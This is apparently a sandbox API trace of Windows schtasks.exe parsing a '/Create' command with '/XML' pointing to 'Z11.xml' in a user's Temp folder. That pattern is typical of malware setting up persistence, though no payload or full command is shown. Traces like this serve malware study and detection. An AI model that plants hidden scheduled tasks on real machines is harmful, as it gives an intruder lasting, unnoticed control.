[0220.163] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.163] lstrlenW (lpString="|query|") returned 7
[0220.163] lstrlenW (lpString="|XML|") returned 5
[0220.163] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0220.163] SetLastError (dwErrCode=0x490)
[0220.163] lstrlenW (lpString="change") returned 6
[0220.163] lstrlenW (lpString="change") returned 6
[0220.163] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.163] lstrlenW (lpString="XML") returned 3
[0220.163] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.163] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|change|") returned 8
[0220.163] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.163] lstrlenW (lpString="|change|") returned 8
[0220.163] lstrlenW (lpString="|XML|") returned 5
[0220.164] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0220.164] SetLastError (dwErrCode=0x490)
[0220.164] lstrlenW (lpString="run") returned 3
[0220.164] lstrlenW (lpString="run") returned 3
[0220.164] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.164] lstrlenW (lpString="XML") returned 3
[0220.164] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.164] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|run|") returned 5
[0220.164] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.164] lstrlenW (lpString="|run|") returned 5
[0220.164] lstrlenW (lpString="|XML|") returned 5
[0220.164] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0220.165] SetLastError (dwErrCode=0x490)
[0220.165] lstrlenW (lpString="end") returned 3
[0220.165] lstrlenW (lpString="end") returned 3
[0220.165] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.165] lstrlenW (lpString="XML") returned 3
[0220.165] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.165] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|end|") returned 5
[0220.165] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.165] lstrlenW (lpString="|end|") returned 5
[0220.165] lstrlenW (lpString="|XML|") returned 5
[0220.165] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0220.166] SetLastError (dwErrCode=0x490)
[0220.166] lstrlenW (lpString="showsid") returned 7
[0220.166] lstrlenW (lpString="showsid") returned 7
[0220.166] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.166] lstrlenW (lpString="XML") returned 3
[0220.166] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.166] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|showsid|") returned 9
[0220.166] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.166] lstrlenW (lpString="|showsid|") returned 9
[0220.166] lstrlenW (lpString="|XML|") returned 5
[0220.166] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0220.166] SetLastError (dwErrCode=0x490)
[0220.166] SetLastError (dwErrCode=0x490)
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] lstrlenW (lpString="/XML") returned 4
[0220.167] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0220.167] SetLastError (dwErrCode=0x490)
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] lstrlenW (lpString="/XML") returned 4
[0220.167] GetProcessHeap () returned 0x2d0000
[0220.167] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa) returned 0x2ec420
[0220.167] GetProcessHeap () returned 0x2d0000
[0220.167] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece10
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.167] lstrlenW (lpString="-/") returned 2
[0220.168] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0220.168] SetLastError (dwErrCode=0x490)
[0220.168] SetLastError (dwErrCode=0x490)
[0220.168] SetLastError (dwErrCode=0x0)
[0220.168] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.168] StrChrIW (lpStart="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", wMatch=0x3a) returned=":\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
[0220.168] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.168] GetProcessHeap () returned 0x2d0000
[0220.168] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ec440
[0220.168] _memicmp (_Buf1=0x2ec440, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.168] GetProcessHeap () returned 0x2d0000
[0220.168] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xc) returned 0x2ec460
[0220.168] GetProcessHeap () returned 0x2d0000
[0220.168] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ed670
[0220.169] _memicmp (_Buf1=0x2ed670, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.169] GetProcessHeap () returned 0x2d0000
[0220.169] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x5e) returned 0x2ede40
[0220.169] SetLastError (dwErrCode=0x7a)
[0220.169] SetLastError (dwErrCode=0x0)
[0220.169] SetLastError (dwErrCode=0x0)
[0220.169] lstrlenW (lpString="C") returned 1
[0220.169] SetLastError (dwErrCode=0x490)
[0220.169] SetLastError (dwErrCode=0x0)
[0220.169] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.169] GetProcessHeap () returned 0x2d0000
[0220.169] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x5a) returned 0x2edeb0
[0220.169] GetProcessHeap () returned 0x2d0000
[0220.169] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece40
[0220.169] SetLastError (dwErrCode=0x0)
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350) returned 1
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec350) returned 0x8
[0220.170] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350 | out: hHeap=0x2d0000) returned 1
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd80) returned 1
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecd80) returned 0x20
[0220.171] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd80 | out: hHeap=0x2d0000) returned 1
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3e0) returned 1
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec3e0) returned 0xa
[0220.171] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3e0 | out: hHeap=0x2d0000) returned 1
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.172] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecdb0) returned 1
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecdb0) returned 0x20
[0220.172] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecdb0 | out: hHeap=0x2d0000) returned 1
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec400) returned 1
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec400) returned 0x6
[0220.172] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec400 | out: hHeap=0x2d0000) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecde0) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecde0) returned 0x20
[0220.173] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecde0 | out: hHeap=0x2d0000) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec420) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec420) returned 0xa
[0220.174] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec420 | out: hHeap=0x2d0000) returned 1
[0220.174] GetProcessHeap () returned 0x2d0000
[0220.174] GetProcessHeap () returned 0x2d0000
[0220.174] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10) returned 1
[0220.174] GetProcessHeap () returned 0x2d0000
[0220.175] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece10) returned 0x20
[0220.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10 | out: hHeap=0x2d0000) returned 1
[0220.175] GetProcessHeap () returned 0x2d0000
[0220.175] GetProcessHeap () returned 0x2d0000
[0220.175] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0) returned 1
[0220.175] GetProcessHeap () returned 0x2d0000
[0220.175] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2edeb0) returned 0x5a
[0220.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0 | out: hHeap=0x2d0000) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece40) returned 0x20
[0220.176] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40 | out: hHeap=0x2d0000) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb20) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb20) returned 0x18
[0220.176] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb20 | out: hHeap=0x2d0000) returned 1
[0220.432] SetLastError (dwErrCode=0x0)
[0220.432] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0220.432] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0220.432] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0220.432] VerifyVersionInfoW (in: lpVersionInformation=0x18c240, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x18c240) returned 1
[0220.432] SetLastError (dwErrCode=0x0)
[0220.432] lstrlenW (lpString="create") returned 6
[0220.433] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0220.433] SetLastError (dwErrCode=0x490)
[0220.433] SetLastError (dwErrCode=0x0)
[0220.433] lstrlenW (lpString="create") returned 6
[0220.433] GetProcessHeap () returned 0x2d0000
[0220.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece40
[0220.433] GetProcessHeap () returned 0x2d0000
[0220.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ed690
[0220.433] _memicmp (_Buf1=0x2ed690, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.433] GetProcessHeap () returned 0x2d0000
[0220.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x16) returned 0x2ed6b0
[0220.433] SetLastError (dwErrCode=0x0)
[0220.433] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.434] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ebd80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0220.434] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0220.434] GetProcessHeap () returned 0x2d0000
[0220.434] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x74e) returned 0x2edeb0
[0220.435] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x2edeb0 | out: lpData=0x2edeb0) returned 1
[0220.435] VerQueryValueW (in: pBlock=0x2edeb0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18c328, puLen=0x18c390 | out: lplpBuffer=0x18c328*=0x2ee24c, puLen=0x18c390) returned 1
[0220.435] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.435] _vsnwprintf (in: _Buffer=0x2ebd80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x18c308 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0220.435] VerQueryValueW (in: pBlock=0x2edeb0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x18c398, puLen=0x18c388 | out: lplpBuffer=0x18c398*=0x2ee078, puLen=0x18c388) returned 1
[0220.435] lstrlenW (lpString="schtasks.exe") returned 12
[0220.436] lstrlenW (lpString="schtasks.exe") returned 12
[0220.436] lstrlenW (lpString=".EXE") returned 4
[0220.436] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0220.436] lstrlenW (lpString="schtasks.exe") returned 12
[0220.436] lstrlenW (lpString=".EXE") returned 4
[0220.436] lstrlenW (lpString="schtasks") returned 8
[0220.436] lstrlenW (lpString="/create") returned 7
[0220.436] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.436] _vsnwprintf (in: _Buffer=0x2ebd80, _BufferCount=0x19, _Format="%s %s", _ArgList=0x18c308 | out: _Buffer="schtasks /create") returned 16
[0220.436] _memicmp (_Buf1=0x2ebc00, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.436] GetProcessHeap () returned 0x2d0000
[0220.436] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece10
[0220.436] _memicmp (_Buf1=0x2ebc20, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.436] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x2ed430, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0220.437] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x30) returned 0x2e7d80
[0220.437] _vsnwprintf (in: _Buffer=0x2ec180, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x18c308 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0) returned 1
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2edeb0) returned 0x74e
[0220.438] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0 | out: hHeap=0x2d0000) returned 1
[0220.438] SetLastError (dwErrCode=0x0)
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="create") returned 6
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="?") returned 1
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="s") returned 1
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="u") returned 1
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="p") returned 1
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="ru") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="rp") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="sc") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="mo") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="d") returned 1
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="m") returned 1
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="i") returned 1
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="tn") returned 2
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="tr") returned 2
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="st") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="sd") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="ed") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="it") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="et") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="k") returned 1
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="du") returned 2
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="ri") returned 2
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="z") returned 1
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="f") returned 1
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="v1") returned 2
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="xml") returned 3
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="ec") returned 2
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="rl") returned 2
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="delay") returned 5
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="np") returned 2
[0220.443] SetLastError (dwErrCode=0x0)
[0220.443] SetLastError (dwErrCode=0x0)
[0220.443] lstrlenW (lpString="/Create") returned 7
[0220.444] lstrlenW (lpString="-/") returned 2
[0220.444] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.444] lstrlenW (lpString="create") returned 6
[0220.444] lstrlenW (lpString="create") returned 6
[0220.444] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.444] lstrlenW (lpString="Create") returned 6
[0220.444] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.444] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.444] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|Create|") returned 8
[0220.444] lstrlenW (lpString="|create|") returned 8
[0220.444] lstrlenW (lpString="|Create|") returned 8
[0220.444] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0220.444] SetLastError (dwErrCode=0x0)
[0220.444] SetLastError (dwErrCode=0x0)
[0220.445] SetLastError (dwErrCode=0x0)
[0220.445] lstrlenW (lpString="/TN") returned 3
[0220.445] lstrlenW (lpString="-/") returned 2
[0220.445] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.445] lstrlenW (lpString="create") returned 6
[0220.445] lstrlenW (lpString="create") returned 6
[0220.445] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.445] lstrlenW (lpString="TN") returned 2
[0220.445] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.445] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.445] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.445] lstrlenW (lpString="|create|") returned 8
[0220.571] lstrlenW (lpString="|TN|") returned 4
[0220.571] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0220.571] SetLastError (dwErrCode=0x490)
[0220.571] lstrlenW (lpString="?") returned 1
[0220.571] lstrlenW (lpString="?") returned 1
[0220.571] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.572] lstrlenW (lpString="TN") returned 2
[0220.572] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.572] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|?|") returned 3
[0220.572] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.572] lstrlenW (lpString="|?|") returned 3
[0220.572] lstrlenW (lpString="|TN|") returned 4
[0220.572] SetLastError (dwErrCode=0x490)
[0220.572] lstrlenW (lpString="s") returned 1
[0220.572] lstrlenW (lpString="s") returned 1
[0220.572] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.572] lstrlenW (lpString="TN") returned 2
[0220.572] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.573] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|s|") returned 3
